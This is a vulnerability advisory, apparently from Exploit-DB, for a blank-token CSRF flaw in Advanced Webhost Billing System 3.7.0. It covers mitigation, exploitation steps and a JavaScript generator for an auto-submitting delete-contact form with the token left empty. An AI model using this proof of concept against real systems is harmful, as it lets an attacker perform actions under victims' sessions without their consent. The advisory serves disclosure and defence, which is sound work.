Vendor: Advanced Webhost Billing System
Author: Rahul Ramakant Singh
CVSS: 8.8 (HIGH)
Vulnerability Type: Cross-Site Request Forgery (CSRF)
CWE: 352
Product Name: Advanced Webhost Billing System
Affected Version From: 3.7.0
Affected Version To: 3.7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:awbs:advanced_webhost_billing_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
Year: 2021

Advanced Webhost Billing System 3.7.0 – Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery (CSRF) vulnerability exists in Advanced Webhost Billing System 3.7.0. The delete-contact action accepts a request whose anti-CSRF token field is blank. An attacker can therefore craft a page that submits a delete-contact request with the token value left empty. When a logged-in victim opens that page, a script on it submits the request to the server under the victim's active session; the server accepts the blank token and deletes the contact without the victim's intent.

Mitigation:

Generate a strong, unpredictable anti-CSRF token per session (or per form) and validate it on the server side for every state-changing request. The validation must reject requests in which the token is missing or empty, not only those in which it mismatches; a check that only compares a token when one was supplied is what makes the blank-token bypass described above possible.

Exploit-DB raw data:

# Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
# Date: 06/01/2021
# Exploit Author: Rahul Ramakant Singh
# Vendor Homepage: https://www.awbs.com/
# Version: 3.7.0
# Tested on Windows

Steps:

1. Log in to the application with an email address and password.
2. Navigate to the additional-contacts page and add a contact.
3. The contact list now offers an option to delete that contact.
4. Log out of the application and create a CSRF PoC whose action is the delete-contact request, with the token value blanked in the PoC.
5. Log in again and send a link to the crafted page (the generated CSRF PoC) to the victim.
6. When the victim opens the link, a script on the crafted page sends the delete-contact request to the server with the victim's active session ID, and the server accepts the blank token value from the request.
7. The contact is deleted.
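The page the steps describe in step 4, as an added example that is not the advisory author's PoC: a self-submitting POST form with the token field present but blank. The endpoint path and the `action`, `contact_id` and `token` parameter names are assumptions for illustration, not AWBS's real ones; a tester would take them from the intercepted delete-contact request.

```javascript
// Added example (not the advisory author's PoC): builds the kind of
// auto-submitting page step 4 describes, with the token field blanked.
// The endpoint path and field names are assumptions, not AWBS's real ones.

// Escape a value for use inside a double-quoted HTML attribute so that
// parameter values containing quotes or ampersands cannot break the form.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build a self-submitting POST form. `fields` maps parameter names to values;
// every field is carried as a hidden input, so a blank token is sent as "".
function buildCsrfPoc(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n");
  return [
    "<!DOCTYPE html>",
    "<html><body>",
    `  <form id="csrf" method="POST" action="${escapeAttr(action)}">`,
    inputs,
    "  </form>",
    // The victim's browser attaches its own session cookie to the submission.
    "  <script>document.getElementById('csrf').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Hypothetical target: the delete-contact action with the token blanked.
const TARGET = "https://billing.example/clients/contacts.php"; // assumed path
const poc = buildCsrfPoc(TARGET, {
  action: "delete",  // assumed parameter name
  contact_id: "7",   // assumed parameter name
  token: "",         // the blanked anti-CSRF token from step 4
});

console.log(poc);
```

Whether the victim's session cookie actually accompanies this cross-site POST depends on the browser's SameSite handling: a session cookie explicitly set with `SameSite=Lax` or `SameSite=Strict` is not sent on it. That is a defence in depth that complements, rather than replaces, rejecting empty tokens on the server.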